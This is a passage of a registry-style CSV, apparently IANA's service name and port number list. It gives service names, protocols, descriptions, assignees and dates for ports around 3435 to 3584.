Server,[Jonathan_S_Shapiro],[Jonathan_S_Shapiro],2002-03,,,,, pacom,3435,tcp,Pacom Security User Port,[Steve_Barton],[Steve_Barton],2002-03,,,,, pacom,3435,udp,Pacom Security User Port,[Steve_Barton],[Steve_Barton],2002-03,,,,, gc-config,3436,tcp,GuardControl Exchange Protocol,[Andreas_Schwarz],[Andreas_Schwarz],2002-03,,,,, gc-config,3436,udp,GuardControl Exchange Protocol,[Andreas_Schwarz],[Andreas_Schwarz],2002-03,,,,, autocueds,3437,tcp,Autocue Directory Service,[Geoff_Back],[Geoff_Back],2002-03,,,,, autocueds,3437,udp,Autocue Directory Service,[Geoff_Back],[Geoff_Back],2002-03,,,,, spiral-admin,3438,tcp,Spiralcraft Admin,[Michael_Toth],[Michael_Toth],2002-03,,,,, spiral-admin,3438,udp,Spiralcraft Admin,[Michael_Toth],[Michael_Toth],2002-03,,,,, hri-port,3439,tcp,HRI Interface Port,[John_Fayos],[John_Fayos],2002-03,,,,, hri-port,3439,udp,HRI Interface Port,[John_Fayos],[John_Fayos],2002-03,,,,, ans-console,3440,tcp,Net Steward Mgmt Console,[John_Richmond],[John_Richmond],2002-03,,,,, ans-console,3440,udp,Net Steward Mgmt Console,[John_Richmond],[John_Richmond],2002-03,,,,, connect-client,3441,tcp,OC Connect Client,,,,,,,, connect-client,3441,udp,OC Connect Client,,,,,,,, connect-server,3442,tcp,OC Connect Server,[Mike_Velten_2],[Mike_Velten_2],2002-03,,,,, connect-server,3442,udp,OC Connect Server,[Mike_Velten_2],[Mike_Velten_2],2002-03,,,,, ov-nnm-websrv,3443,tcp,OpenView Network Node Manager WEB Server,[Anthony_Walker],[Anthony_Walker],2002-03,,,,, ov-nnm-websrv,3443,udp,OpenView Network Node Manager WEB Server,[Anthony_Walker],[Anthony_Walker],2002-03,,,,, denali-server,3444,tcp,Denali Server,[Joe_Devlin],[Joe_Devlin],2002-03,,,,, denali-server,3444,udp,Denali Server,[Joe_Devlin],[Joe_Devlin],2002-03,,,,, monp,3445,tcp,Media Object Network,[Ron_Herardian],[Ron_Herardian],2002-03,,,,, monp,3445,udp,Media Object Network,[Ron_Herardian],[Ron_Herardian],2002-03,,,,, 3comfaxrpc,3446,tcp,3Com FAX RPC port,[Christopher_Wells_2],[Christopher_Wells_2],2002-04,,,,, 3comfaxrpc,3446,udp,3Com FAX RPC port,[Christopher_Wells_2],[Christopher_Wells_2],2002-04,,,,, directnet,3447,tcp,DirectNet IM System,[Gregory_Richards],[Gregory_Richards],2002-04,,,,, directnet,3447,udp,DirectNet IM System,[Gregory_Richards],[Gregory_Richards],2002-04,,,,, dnc-port,3448,tcp,Discovery and Net Config,[Chi_Chen],[Chi_Chen],2002-04,,,,, dnc-port,3448,udp,Discovery and Net Config,[Chi_Chen],[Chi_Chen],2002-04,,,,, hotu-chat,3449,tcp,HotU Chat,[Tim_Burgess],[Tim_Burgess],2002-04,,,,, hotu-chat,3449,udp,HotU Chat,[Tim_Burgess],[Tim_Burgess],2002-04,,,,, castorproxy,3450,tcp,CAStorProxy,[Raymond_J_Young],[Raymond_J_Young],2002-04,,,,, castorproxy,3450,udp,CAStorProxy,[Raymond_J_Young],[Raymond_J_Young],2002-04,,,,, asam,3451,tcp,ASAM Services,[Mike_Gossett],[Mike_Gossett],2002-04,,,,, asam,3451,udp,ASAM Services,[Mike_Gossett],[Mike_Gossett],2002-04,,,,, sabp-signal,3452,tcp,SABP-Signalling Protocol,[Brendan_McWilliams],[Brendan_McWilliams],2002-04,,,,, sabp-signal,3452,udp,SABP-Signalling Protocol,[Brendan_McWilliams],[Brendan_McWilliams],2002-04,,,,, pscupd,3453,tcp,PSC Update Port,[Reid_B_Ligon],[Reid_B_Ligon],,,,,, pscupd,3453,udp,PSC Update Port,[Reid_B_Ligon],[Reid_B_Ligon],,,,,, mira,3454,tcp,Apple Remote Access Protocol,[Mike_Alexander],[Mike_Alexander],,,,,, mira,3454,udp,Apple Remote Access Protocol,[Mike_Alexander],[Mike_Alexander],,,,,, prsvp,3455,tcp,RSVP Port,[Bob_Braden],[Bob_Braden],,,,,, prsvp,3455,udp,RSVP Port,[Bob_Braden],[Bob_Braden],,,,,, vat,3456,tcp,VAT default data,[Van_Jacobson],[Van_Jacobson],,,,,, vat,3456,udp,VAT default data,[Van_Jacobson],[Van_Jacobson],,,,,, vat-control,3457,tcp,VAT default control,[Van_Jacobson],[Van_Jacobson],,,,,, vat-control,3457,udp,VAT default control,[Van_Jacobson],[Van_Jacobson],,,,,, d3winosfi,3458,tcp,D3WinOSFI,[Brad_Hamilton],[Brad_Hamilton],,,,,, d3winosfi,3458,udp,D3WinOSFI,[Brad_Hamilton],[Brad_Hamilton],,,,,, integral,3459,tcp,TIP Integral,[Olivier_Mascia],[Olivier_Mascia],,,,,, integral,3459,udp,TIP Integral,[Olivier_Mascia],[Olivier_Mascia],,,,,, edm-manager,3460,tcp,EDM Manger,,,,,,,, edm-manager,3460,udp,EDM Manger,,,,,,,, edm-stager,3461,tcp,EDM Stager,,,,,,,, edm-stager,3461,udp,EDM Stager,,,,,,,, edm-std-notify,3462,tcp,EDM STD Notify,,,,,,,, edm-std-notify,3462,udp,EDM STD Notify,,,,,,,, edm-adm-notify,3463,tcp,EDM ADM Notify,,,,,,,, edm-adm-notify,3463,udp,EDM ADM Notify,,,,,,,, edm-mgr-sync,3464,tcp,EDM MGR Sync,,,,,,,, edm-mgr-sync,3464,udp,EDM MGR Sync,,,,,,,, edm-mgr-cntrl,3465,tcp,EDM MGR Cntrl,[Tom_Hennessy],[Tom_Hennessy],,,,,, edm-mgr-cntrl,3465,udp,EDM MGR Cntrl,[Tom_Hennessy],[Tom_Hennessy],,,,,, workflow,3466,tcp,WORKFLOW,[Robert_Hufsky],[Robert_Hufsky],,,,,, workflow,3466,udp,WORKFLOW,[Robert_Hufsky],[Robert_Hufsky],,,,,, rcst,3467,tcp,RCST,[Kit_Sturgeon],[Kit_Sturgeon],,,,,, rcst,3467,udp,RCST,[Kit_Sturgeon],[Kit_Sturgeon],,,,,, ttcmremotectrl,3468,tcp,TTCM Remote Controll,[Yossi_Cohen_Shahar],[Yossi_Cohen_Shahar],,,,,, ttcmremotectrl,3468,udp,TTCM Remote Controll,[Yossi_Cohen_Shahar],[Yossi_Cohen_Shahar],,,,,, pluribus,3469,tcp,Pluribus,[Mark_Miller],[Mark_Miller],,,,,, pluribus,3469,udp,Pluribus,[Mark_Miller],[Mark_Miller],,,,,, jt400,3470,tcp,jt400,,,,,,,, jt400,3470,udp,jt400,,,,,,,, jt400-ssl,3471,tcp,jt400-ssl,[Clifton_Nock],[Clifton_Nock],,,,,, jt400-ssl,3471,udp,jt400-ssl,[Clifton_Nock],[Clifton_Nock],,,,,, jaugsremotec-1,3472,tcp,JAUGS N-G Remotec 1,,,,,,,, jaugsremotec-1,3472,udp,JAUGS N-G Remotec 1,,,,,,,, jaugsremotec-2,3473,tcp,JAUGS N-G Remotec 2,[Steven_B_Cliff],[Steven_B_Cliff],2002-04,,,,, jaugsremotec-2,3473,udp,JAUGS N-G Remotec 2,[Steven_B_Cliff],[Steven_B_Cliff],2002-04,,,,, ttntspauto,3474,tcp,TSP Automation,[Arnie_Koster],[Arnie_Koster],2002-04,,,,, ttntspauto,3474,udp,TSP Automation,[Arnie_Koster],[Arnie_Koster],2002-04,,,,, genisar-port,3475,tcp,Genisar Comm Port,[Candace_Niccolson],[Candace_Niccolson],2002-04,,,,, genisar-port,3475,udp,Genisar Comm Port,[Candace_Niccolson],[Candace_Niccolson],2002-04,,,,, nppmp,3476,tcp,NVIDIA Mgmt Protocol,[Gilbert_Yeung],[Gilbert_Yeung],2002-04,,,,, nppmp,3476,udp,NVIDIA Mgmt Protocol,[Gilbert_Yeung],[Gilbert_Yeung],2002-04,,,,, ecomm,3477,tcp,eComm link port,[Thomas_Soerensen],[Thomas_Soerensen],2002-04,,,,, ecomm,3477,udp,eComm link port,[Thomas_Soerensen],[Thomas_Soerensen],2002-04,,,,, stun,3478,tcp,Session Traversal Utilities for NAT (STUN) port,,,,,[RFC5389],,, stun,3478,udp,Session Traversal Utilities for NAT (STUN) port,,,,,[RFC5389],,, turn,3478,tcp,TURN over TCP,,,,,[RFC5766],,, turn,3478,udp,TURN over UDP,,,,,[RFC5766],,, stun-behavior,3478,tcp,STUN Behavior Discovery over TCP,,,,,[RFC5780],,, stun-behavior,3478,udp,STUN Behavior Discovery over UDP,,,,,[RFC5780],,, twrpc,3479,tcp,2Wire RPC,[Wire_IANA_Contact],[Wire_IANA_Contact],2002-04,,,,, twrpc,3479,udp,2Wire RPC,[Wire_IANA_Contact],[Wire_IANA_Contact],2002-04,,,,, plethora,3480,tcp,Secure Virtual Workspace,[Tim_Simms],[Tim_Simms],2002-04,,,,, plethora,3480,udp,Secure Virtual Workspace,[Tim_Simms],[Tim_Simms],2002-04,,,,, cleanerliverc,3481,tcp,CleanerLive remote ctrl,[David_Mojdehi],[David_Mojdehi],2002-04,,,,, cleanerliverc,3481,udp,CleanerLive remote ctrl,[David_Mojdehi],[David_Mojdehi],2002-04,,,,, vulture,3482,tcp,Vulture Monitoring System,[Jason_Santos],[Jason_Santos],2002-04,,,,, vulture,3482,udp,Vulture Monitoring System,[Jason_Santos],[Jason_Santos],2002-04,,,,, slim-devices,3483,tcp,Slim Devices Protocol,[Sean_Adams],[Sean_Adams],2002-05,,,,, slim-devices,3483,udp,Slim Devices Protocol,[Sean_Adams],[Sean_Adams],2002-05,,,,, gbs-stp,3484,tcp,GBS SnapTalk Protocol,[Eric_Harris_Braun],[Eric_Harris_Braun],2002-05,,,,, gbs-stp,3484,udp,GBS SnapTalk Protocol,[Eric_Harris_Braun],[Eric_Harris_Braun],2002-05,,,,, celatalk,3485,tcp,CelaTalk,[Carl_Blundell],[Carl_Blundell],2002-05,,,,, celatalk,3485,udp,CelaTalk,[Carl_Blundell],[Carl_Blundell],2002-05,,,,, ifsf-hb-port,3486,tcp,IFSF Heartbeat Port,[IFSF_Secretary],[IFSF_Secretary],2002-05,,,,, ifsf-hb-port,3486,udp,IFSF Heartbeat Port,[IFSF_Secretary],[IFSF_Secretary],2002-05,,,,, ltctcp,3487,tcp,LISA TCP Transfer Channel,,,,,,,, ltcudp,3487,udp,LISA UDP Transfer Channel,[Pit_Vetterick],[Pit_Vetterick],2002-05,,,,, fs-rh-srv,3488,tcp,FS Remote Host Server,[Brian_Nickles],[Brian_Nickles],2002-05,,,,, fs-rh-srv,3488,udp,FS Remote Host Server,[Brian_Nickles],[Brian_Nickles],2002-05,,,,, dtp-dia,3489,tcp,DTP/DIA,[Alexei_V_Soloviev],[Alexei_V_Soloviev],2002-05,,,,, dtp-dia,3489,udp,DTP/DIA,[Alexei_V_Soloviev],[Alexei_V_Soloviev],2002-05,,,,, colubris,3490,tcp,Colubris Management Port,[Gilbert_Moineau],[Gilbert_Moineau],2002-05,,,,, colubris,3490,udp,Colubris Management Port,[Gilbert_Moineau],[Gilbert_Moineau],2002-05,,,,, swr-port,3491,tcp,SWR Port,[Ian_Manning],[Ian_Manning],2002-05,,,,, swr-port,3491,udp,SWR Port,[Ian_Manning],[Ian_Manning],2002-05,,,,, tvdumtray-port,3492,tcp,TVDUM Tray Port,[Peter_Boers],[Peter_Boers],2002-05,,,,, tvdumtray-port,3492,udp,TVDUM Tray Port,[Peter_Boers],[Peter_Boers],2002-05,,,,, nut,3493,tcp,Network UPS Tools,[Russell_Kroll],[Russell_Kroll],2002-05,,,,, nut,3493,udp,Network UPS Tools,[Russell_Kroll],[Russell_Kroll],2002-05,,,,, ibm3494,3494,tcp,IBM 3494,[Jeffrey_Pilch],[Jeffrey_Pilch],,,,,, ibm3494,3494,udp,IBM 3494,[Jeffrey_Pilch],[Jeffrey_Pilch],,,,,, seclayer-tcp,3495,tcp,securitylayer over tcp,,,,,,,, seclayer-tcp,3495,udp,securitylayer over tcp,,,,,,,, seclayer-tls,3496,tcp,securitylayer over tls,[Arno_Hollosi],[Arno_Hollosi],2002-03,,,,, seclayer-tls,3496,udp,securitylayer over tls,[Arno_Hollosi],[Arno_Hollosi],2002-03,,,,, ipether232port,3497,tcp,ipEther232Port,[Marcus_Leufgen],[Marcus_Leufgen],2002-05,,,,, ipether232port,3497,udp,ipEther232Port,[Marcus_Leufgen],[Marcus_Leufgen],2002-05,,,,, dashpas-port,3498,tcp,DASHPAS user port,[Albrecht_Mayer],[Albrecht_Mayer],2002-05,,,,, dashpas-port,3498,udp,DASHPAS user port,[Albrecht_Mayer],[Albrecht_Mayer],2002-05,,,,, sccip-media,3499,tcp,SccIP Media,[David_Yon_2],[David_Yon_2],2002-05,,,,, sccip-media,3499,udp,SccIP Media,[David_Yon_2],[David_Yon_2],2002-05,,,,, rtmp-port,3500,tcp,RTMP Port,[Miriam_Wohlgelernter],[Miriam_Wohlgelernter],,,,,, rtmp-port,3500,udp,RTMP Port,[Miriam_Wohlgelernter],[Miriam_Wohlgelernter],,,,,, isoft-p2p,3501,tcp,iSoft-P2P,[David_Walling_2],[David_Walling_2],,,,,, isoft-p2p,3501,udp,iSoft-P2P,[David_Walling_2],[David_Walling_2],,,,,, avinstalldisc,3502,tcp,Avocent Install Discovery,[Brian_S_Stewart_2],[Brian_S_Stewart_2],,,,,, avinstalldisc,3502,udp,Avocent Install Discovery,[Brian_S_Stewart_2],[Brian_S_Stewart_2],,,,,, lsp-ping,3503,tcp,MPLS LSP-echo Port,,,,,[RFC4379],,, lsp-ping,3503,udp,MPLS LSP-echo Port,,,,,[RFC4379],,, ironstorm,3504,tcp,IronStorm game server,[Arnaud_Clermonte],[Arnaud_Clermonte],,,,,, ironstorm,3504,udp,IronStorm game server,[Arnaud_Clermonte],[Arnaud_Clermonte],,,,,, ccmcomm,3505,tcp,CCM communications port,[Tom_Bougan],[Tom_Bougan],,,,,, ccmcomm,3505,udp,CCM communications port,[Tom_Bougan],[Tom_Bougan],,,,,, apc-3506,3506,tcp,APC 3506,[American_Power_Conve],[American_Power_Conve],,,,,, apc-3506,3506,udp,APC 3506,[American_Power_Conve],[American_Power_Conve],,,,,, nesh-broker,3507,tcp,Nesh Broker Port,[Jeremy_Maiden],[Jeremy_Maiden],,,,,, nesh-broker,3507,udp,Nesh Broker Port,[Jeremy_Maiden],[Jeremy_Maiden],,,,,, interactionweb,3508,tcp,Interaction Web,[Mike_Gagle_2],[Mike_Gagle_2],,,,,, interactionweb,3508,udp,Interaction Web,[Mike_Gagle_2],[Mike_Gagle_2],,,,,, vt-ssl,3509,tcp,Virtual Token SSL Port,[Libor_Sykora],[Libor_Sykora],2002-05,,,,, vt-ssl,3509,udp,Virtual Token SSL Port,[Libor_Sykora],[Libor_Sykora],2002-05,,,,, xss-port,3510,tcp,XSS Port,[Joe_Purcell],[Joe_Purcell],2002-05,,,,, xss-port,3510,udp,XSS Port,[Joe_Purcell],[Joe_Purcell],2002-05,,,,, webmail-2,3511,tcp,WebMail/2,[Dimitris_Michelinaki],[Dimitris_Michelinaki],2002-05,,,,, webmail-2,3511,udp,WebMail/2,[Dimitris_Michelinaki],[Dimitris_Michelinaki],2002-05,,,,, aztec,3512,tcp,Aztec Distribution Port,[Alan_Francis],[Alan_Francis],2002-05,,,,, aztec,3512,udp,Aztec Distribution Port,[Alan_Francis],[Alan_Francis],2002-05,,,,, arcpd,3513,tcp,Adaptec Remote Protocol,[Hardy_Doelfel],[Hardy_Doelfel],2002-05,,,,, arcpd,3513,udp,Adaptec Remote Protocol,[Hardy_Doelfel],[Hardy_Doelfel],2002-05,,,,, must-p2p,3514,tcp,MUST Peer to Peer,,,,,,,, must-p2p,3514,udp,MUST Peer to Peer,,,,,,,, must-backplane,3515,tcp,MUST Backplane,[Rick_Stefanik],[Rick_Stefanik],2002-05,,,,, must-backplane,3515,udp,MUST Backplane,[Rick_Stefanik],[Rick_Stefanik],2002-05,,,,, smartcard-port,3516,tcp,Smartcard Port,[Scott_Guthery],[Scott_Guthery],2002-05,,,,, smartcard-port,3516,udp,Smartcard Port,[Scott_Guthery],[Scott_Guthery],2002-05,,,,, 802-11-iapp,3517,tcp,IEEE 802.11 WLANs WG IAPP,[Stuart_J_Kerry],[Stuart_J_Kerry],2002-05,,,,, 802-11-iapp,3517,udp,IEEE 802.11 WLANs WG IAPP,[Stuart_J_Kerry],[Stuart_J_Kerry],2002-05,,,,, artifact-msg,3518,tcp,Artifact Message Server,[Ron_Capwell],[Ron_Capwell],2002-06,,,,, artifact-msg,3518,udp,Artifact Message Server,[Ron_Capwell],[Ron_Capwell],2002-06,,,,, nvmsgd,3519,tcp,Netvion Messenger Port,,,,,,,, galileo,3519,udp,Netvion Galileo Port,,,,,,,, galileolog,3520,tcp,Netvion Galileo Log Port,[Ray_Caruso],[Ray_Caruso],2002-06,,,,, galileolog,3520,udp,Netvion Galileo Log Port,[Ray_Caruso],[Ray_Caruso],2002-06,,,,, mc3ss,3521,tcp,Telequip Labs MC3SS,[Michael_Sparks],[Michael_Sparks],2002-06,,,,, mc3ss,3521,udp,Telequip Labs MC3SS,[Michael_Sparks],[Michael_Sparks],2002-06,,,,, nfs-domainroot,,tcp,"NFS service for the domain root, the root of an organization's published file namespace.",[IESG],[IETF_Chair],2012-04-24,,[RFC6641],,,Defined TXT keys: None nssocketport,3522,tcp,DO over NSSocketPort,[Douglas_Davidson],[Douglas_Davidson],2002-06,,,,, nssocketport,3522,udp,DO over NSSocketPort,[Douglas_Davidson],[Douglas_Davidson],2002-06,,,,, odeumservlink,3523,tcp,Odeum Serverlink,[Mads_Peter_Back],[Mads_Peter_Back],2002-06,,,,, odeumservlink,3523,udp,Odeum Serverlink,[Mads_Peter_Back],[Mads_Peter_Back],2002-06,,,,, ecmport,3524,tcp,ECM Server port,,,,,,,, ecmport,3524,udp,ECM Server port,,,,,,,, eisport,3525,tcp,EIS Server port,[Paul_Kraus],[Paul_Kraus],2002-06,,,,, eisport,3525,udp,EIS Server port,[Paul_Kraus],[Paul_Kraus],2002-06,,,,, starquiz-port,3526,tcp,starQuiz Port,[Adam_Ernst_2],[Adam_Ernst_2],2002-06,,,,, starquiz-port,3526,udp,starQuiz Port,[Adam_Ernst_2],[Adam_Ernst_2],2002-06,,,,, beserver-msg-q,3527,tcp,VERITAS Backup Exec Server,[Katherine_Wattwood],[Katherine_Wattwood],2002-06,,,,, beserver-msg-q,3527,udp,VERITAS Backup Exec Server,[Katherine_Wattwood],[Katherine_Wattwood],2002-06,,,,, jboss-iiop,3528,tcp,JBoss IIOP,,,,,,,, jboss-iiop,3528,udp,JBoss IIOP,,,,,,,, jboss-iiop-ssl,3529,tcp,JBoss IIOP/SSL,[Francisco_Reverbel],[Francisco_Reverbel],2002-06,,,,, jboss-iiop-ssl,3529,udp,JBoss IIOP/SSL,[Francisco_Reverbel],[Francisco_Reverbel],2002-06,,,,, gf,3530,tcp,Grid Friendly,[Daivd_P_Chassin],[Daivd_P_Chassin],2002-06,,,,, gf,3530,udp,Grid Friendly,[Daivd_P_Chassin],[Daivd_P_Chassin],2002-06,,,,, joltid,3531,tcp,Joltid,[Ahti_Heinla],[Ahti_Heinla],2002-06,,,,, joltid,3531,udp,Joltid,[Ahti_Heinla],[Ahti_Heinla],2002-06,,,,, raven-rmp,3532,tcp,Raven Remote Management Control,,,,,,,, raven-rmp,3532,udp,Raven Remote Management Control,,,,,,,, raven-rdp,3533,tcp,Raven Remote Management Data,[Daniel_Sorlov_2],[Daniel_Sorlov_2],2002-06,,,,, raven-rdp,3533,udp,Raven Remote Management Data,[Daniel_Sorlov_2],[Daniel_Sorlov_2],2002-06,,,,, urld-port,3534,tcp,URL Daemon Port,[Jim_Binkley],[Jim_Binkley],2002-06,,,,, urld-port,3534,udp,URL Daemon Port,[Jim_Binkley],[Jim_Binkley],2002-06,,,,, ms-la,3535,tcp,MS-LA,[Eric_Ledoux],[Eric_Ledoux],,,,,, ms-la,3535,udp,MS-LA,[Eric_Ledoux],[Eric_Ledoux],,,,,, snac,3536,tcp,SNAC,[Tatsuya_Igarashi],[Tatsuya_Igarashi],2002-07,,,,, snac,3536,udp,SNAC,[Tatsuya_Igarashi],[Tatsuya_Igarashi],2002-07,,,,, ni-visa-remote,3537,tcp,Remote NI-VISA port,[Sinnadurai_Dharshan],[Sinnadurai_Dharshan],2002-07,,,,, ni-visa-remote,3537,udp,Remote NI-VISA port,[Sinnadurai_Dharshan],[Sinnadurai_Dharshan],2002-07,,,,, ibm-diradm,3538,tcp,IBM Directory Server,,,,,,,, ibm-diradm,3538,udp,IBM Directory Server,,,,,,,, ibm-diradm-ssl,3539,tcp,IBM Directory Server SSL,[Mark_Cavage],[Mark_Cavage],2002-07,,,,, ibm-diradm-ssl,3539,udp,IBM Directory Server SSL,[Mark_Cavage],[Mark_Cavage],2002-07,,,,, pnrp-port,3540,tcp,PNRP User Port,[Igor_Kostic],[Igor_Kostic],2002-07,,,,, pnrp-port,3540,udp,PNRP User Port,[Igor_Kostic],[Igor_Kostic],2002-07,,,,, voispeed-port,3541,tcp,VoiSpeed Port,[Virgilio_Lattanzi],[Virgilio_Lattanzi],2002-07,,,,, voispeed-port,3541,udp,VoiSpeed Port,[Virgilio_Lattanzi],[Virgilio_Lattanzi],2002-07,,,,, hacl-monitor,3542,tcp,HA cluster monitor,[Jason_Ko],[Jason_Ko],2002-07,,,,, hacl-monitor,3542,udp,HA cluster monitor,[Jason_Ko],[Jason_Ko],2002-07,,,,, qftest-lookup,3543,tcp,qftest Lookup Port,[Gregor_Schmid],[Gregor_Schmid],2002-07,,,,, qftest-lookup,3543,udp,qftest Lookup Port,[Gregor_Schmid],[Gregor_Schmid],2002-07,,,,, teredo,3544,tcp,Teredo Port,,,,,[RFC4380],,, teredo,3544,udp,Teredo Port,,,,,[RFC4380],,, camac,3545,tcp,CAMAC equipment,[Eugene_Zhiganov],[Eugene_Zhiganov],2002-07,,,,, camac,3545,udp,CAMAC equipment,[Eugene_Zhiganov],[Eugene_Zhiganov],2002-07,,,,, ,3546,,Unassigned,,,,2002-09,,,, symantec-sim,3547,tcp,Symantec SIM,[George_Dzieciol],[George_Dzieciol],2002-07,,,,, symantec-sim,3547,udp,Symantec SIM,[George_Dzieciol],[George_Dzieciol],2002-07,,,,, interworld,3548,tcp,Interworld,[John_Stephen],[John_Stephen],2002-07,,,,, interworld,3548,udp,Interworld,[John_Stephen],[John_Stephen],2002-07,,,,, tellumat-nms,3549,tcp,Tellumat MDR NMS,[Hennie_van_der_Merwe],[Hennie_van_der_Merwe],2002-07,,,,, tellumat-nms,3549,udp,Tellumat MDR NMS,[Hennie_van_der_Merwe],[Hennie_van_der_Merwe],2002-07,,,,, ssmpp,3550,tcp,Secure SMPP,[Cormac_Long],[Cormac_Long],2002-07,,,,, ssmpp,3550,udp,Secure SMPP,[Cormac_Long],[Cormac_Long],2002-07,,,,, apcupsd,3551,tcp,Apcupsd Information Port,[Riccardo_Facchetti],[Riccardo_Facchetti],2002-07,,,,, apcupsd,3551,udp,Apcupsd Information Port,[Riccardo_Facchetti],[Riccardo_Facchetti],2002-07,,,,, taserver,3552,tcp,TeamAgenda Server Port,[Dany_Ayotte],[Dany_Ayotte],2002-07,,,,, taserver,3552,udp,TeamAgenda Server Port,[Dany_Ayotte],[Dany_Ayotte],2002-07,,,,, rbr-discovery,3553,tcp,Red Box Recorder ADP,[Simon_Jolly],[Simon_Jolly],2002-07,,,,, rbr-discovery,3553,udp,Red Box Recorder ADP,[Simon_Jolly],[Simon_Jolly],2002-07,,,,, questnotify,3554,tcp,Quest Notification Server,[Rob_Griffin],[Rob_Griffin],2002-07,,,,, questnotify,3554,udp,Quest Notification Server,[Rob_Griffin],[Rob_Griffin],2002-07,,,,, razor,3555,tcp,Vipul's Razor,[Vipul_Ved_Prakash],[Vipul_Ved_Prakash],2002-07,,,,, razor,3555,udp,Vipul's Razor,[Vipul_Ved_Prakash],[Vipul_Ved_Prakash],2002-07,,,,, sky-transport,3556,tcp,Sky Transport Protocol,[Michael_Paddon],[Michael_Paddon],2002-07,,,,, sky-transport,3556,udp,Sky Transport Protocol,[Michael_Paddon],[Michael_Paddon],2002-07,,,,, personalos-001,3557,tcp,PersonalOS Comm Port,[Shane_Roberts],[Shane_Roberts],2002-07,,,,, personalos-001,3557,udp,PersonalOS Comm Port,[Shane_Roberts],[Shane_Roberts],2002-07,,,,, mcp-port,3558,tcp,MCP user port,[Professor_Paul_S_Wa],[Professor_Paul_S_Wa],2002-07,,,,, mcp-port,3558,udp,MCP user port,[Professor_Paul_S_Wa],[Professor_Paul_S_Wa],2002-07,,,,, cctv-port,3559,tcp,CCTV control port,[John_Skidmore],[John_Skidmore],2002-07,,,,, cctv-port,3559,udp,CCTV control port,[John_Skidmore],[John_Skidmore],2002-07,,,,, iniserve-port,3560,tcp,INIServe port,[Peter_Moylan],[Peter_Moylan],2002-08,,,,, iniserve-port,3560,udp,INIServe port,[Peter_Moylan],[Peter_Moylan],2002-08,,,,, bmc-onekey,3561,tcp,BMC-OneKey,[Portnoy_Boxman],[Portnoy_Boxman],2002-08,,,,, bmc-onekey,3561,udp,BMC-OneKey,[Portnoy_Boxman],[Portnoy_Boxman],2002-08,,,,, sdbproxy,3562,tcp,SDBProxy,[Eric_Grange],[Eric_Grange],2002-08,,,,, sdbproxy,3562,udp,SDBProxy,[Eric_Grange],[Eric_Grange],2002-08,,,,, watcomdebug,3563,tcp,Watcom Debug,[Dave_Neudoerffer],[Dave_Neudoerffer],,,,,, watcomdebug,3563,udp,Watcom Debug,[Dave_Neudoerffer],[Dave_Neudoerffer],,,,,, esimport,3564,tcp,Electromed SIM port,[Francois_Marchand],[Francois_Marchand],2002-08,,,,, esimport,3564,udp,Electromed SIM port,[Francois_Marchand],[Francois_Marchand],2002-08,,,,, m2pa,3565,tcp,M2PA,,,,,[RFC4165],,, ,3565,udp,Reserved,,,,,,,, m2pa,3565,sctp,M2PA,,,,,[RFC4165],,, quest-data-hub,3566,tcp,Quest Data Hub,[Greg_Cottman_2],[Greg_Cottman_2],2010-10-18,,,,, ,3566,udp,Reserved,,,,2010-10-18,,,, enc-eps,3567,tcp,EMIT protocol stack,[Panasonic_Intranet_Panasonic_North_America_PEWLA],[Bryant_Eastham],2002-08,2012-11-12,,,, enc-eps,3567,udp,EMIT protocol stack,[Panasonic_Intranet_Panasonic_North_America_PEWLA],[Bryant_Eastham],2002-08,2012-11-12,,,, enc-tunnel-sec,3568,tcp,EMIT secure tunnel,[Panasonic_Intranet_Panasonic_North_America_PEWLA],[Bryant_Eastham],2003-01,2012-11-12,,,, enc-tunnel-sec,3568,udp,EMIT secure tunnel,[Panasonic_Intranet_Panasonic_North_America_PEWLA],[Bryant_Eastham],2003-01,2012-11-12,,,, mbg-ctrl,3569,tcp,Meinberg Control Service,[Martin_Burnicki],[Martin_Burnicki],2002-08,,,,, mbg-ctrl,3569,udp,Meinberg Control Service,[Martin_Burnicki],[Martin_Burnicki],2002-08,,,,, mccwebsvr-port,3570,tcp,MCC Web Server Port,,,,,,,, mccwebsvr-port,3570,udp,MCC Web Server Port,,,,,,,, megardsvr-port,3571,tcp,MegaRAID Server Port,,,,,,,, megardsvr-port,3571,udp,MegaRAID Server Port,,,,,,,, megaregsvrport,3572,tcp,Registration Server Port,[Sreenivas_Bagalkote],[Sreenivas_Bagalkote],2002-08,,,,, megaregsvrport,3572,udp,Registration Server Port,[Sreenivas_Bagalkote],[Sreenivas_Bagalkote],2002-08,,,,, tag-ups-1,3573,tcp,Advantage Group UPS Suite,[James_Goddard],[James_Goddard],2002-08,,,,, tag-ups-1,3573,udp,Advantage Group UPS Suite,[James_Goddard],[James_Goddard],2002-08,,,,, dmaf-server,3574,tcp,DMAF Server,,,,,,,, dmaf-caster,3574,udp,DMAF Caster,[Ramakrishna_Nadendla],[Ramakrishna_Nadendla],2002-08,,,,, ccm-port,3575,tcp,Coalsere CCM Port,,,,,,,, ccm-port,3575,udp,Coalsere CCM Port,,,,,,,, cmc-port,3576,tcp,Coalsere CMC Port,[Chris_Hawkinson],[Chris_Hawkinson],2002-08,,,,, cmc-port,3576,udp,Coalsere CMC Port,[Chris_Hawkinson],[Chris_Hawkinson],2002-08,,,,, config-port,3577,tcp,Configuration Port,,,,,,,, config-port,3577,udp,Configuration Port,,,,,,,, data-port,3578,tcp,Data Port,[Anupam_Bharali],[Anupam_Bharali],2002-08,,,,, data-port,3578,udp,Data Port,[Anupam_Bharali],[Anupam_Bharali],2002-08,,,,, ttat3lb,3579,tcp,Tarantella Load Balancing,[Jim_Musgrave],[Jim_Musgrave],2002-08,,,,, ttat3lb,3579,udp,Tarantella Load Balancing,[Jim_Musgrave],[Jim_Musgrave],2002-08,,,,, nati-svrloc,3580,tcp,NATI-ServiceLocator,[Jason_Case],[Jason_Case],2002-08,,,,, nati-svrloc,3580,udp,NATI-ServiceLocator,[Jason_Case],[Jason_Case],2002-08,,,,, kfxaclicensing,3581,tcp,Ascent Capture Licensing,[Brad_Hamilton_2],[Brad_Hamilton_2],2002-08,,,,, kfxaclicensing,3581,udp,Ascent Capture Licensing,[Brad_Hamilton_2],[Brad_Hamilton_2],2002-08,,,,, press,3582,tcp,PEG PRESS Server,[Jim_DeLisle],[Jim_DeLisle],2002-08,,,,, press,3582,udp,PEG PRESS Server,[Jim_DeLisle],[Jim_DeLisle],2002-08,,,,, canex-watch,3583,tcp,CANEX Watch System,[Peter_Kollath],[Peter_Kollath],2002-08,,,,, canex-watch,3583,udp,CANEX Watch System,[Peter_Kollath],[Peter_Kollath],2002-08,,,,, u-dbap,3584,tcp,U-DBase Access Protocol,[Bodo_Rueskamp],[Bodo_Rueskamp],2002-08,,,,, u-dbap,3584,udp,U-DBase Access 